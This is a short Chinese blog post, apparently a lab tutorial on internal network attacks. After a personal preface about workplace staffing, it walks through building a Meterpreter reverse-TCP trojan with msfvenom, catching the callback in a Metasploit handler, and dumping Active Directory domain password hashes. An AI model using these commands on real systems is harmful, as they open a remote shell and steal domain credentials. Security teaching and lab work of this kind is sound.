明天休息一天,后天补班,然后连续工作三天,请一天假,做PPT。是的,国庆我要讲内网安全入门,希望大家能捧个场。由于组内离职了2个核心员工,我设计的一堆项目,都没人开发了,Q4不得不自己Coding,一个是AI Spark项目,另一个是UEBA新规则,还有一堆杂七杂八的支撑项目。酒入愁肠愁更愁,也不知道自己能坚持多久,也不知道剩下的人能坚持多久。
第一步:生成木马文件- 生成木马(hack.exe)
- 投递到目标服务(windows 192.168.160.143)
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.160.140 -f exe > hack.exe第二步:监听5555端口
- 通过metasploit监听5555端口
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 5555第三步:期待鱼儿上钩
- 去目标服务器上双击一下木马(hack.exe)
- 只要双击(hack.exe),立马控制目标
exploit -j -z
由于是双击的木马,并不是特权账号,导致无法获得ntds.dit活动目录文件,也就无法拿到域散列值。所以,我又通过管理员权限运行了木马文件,这回有了。
第五步:读取ntds.dit,解析得到域散列值use windows/gather/credentials/domain_hashdump set session 3
- 遗憾的是,竟然报错,我一个特权账号,竟然拷贝不出来ntds.dit
- 怎么能放弃?继续搞!
- 直接进入shell会话里,hashdump直接拿到所有的域散列值
本篇完~
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)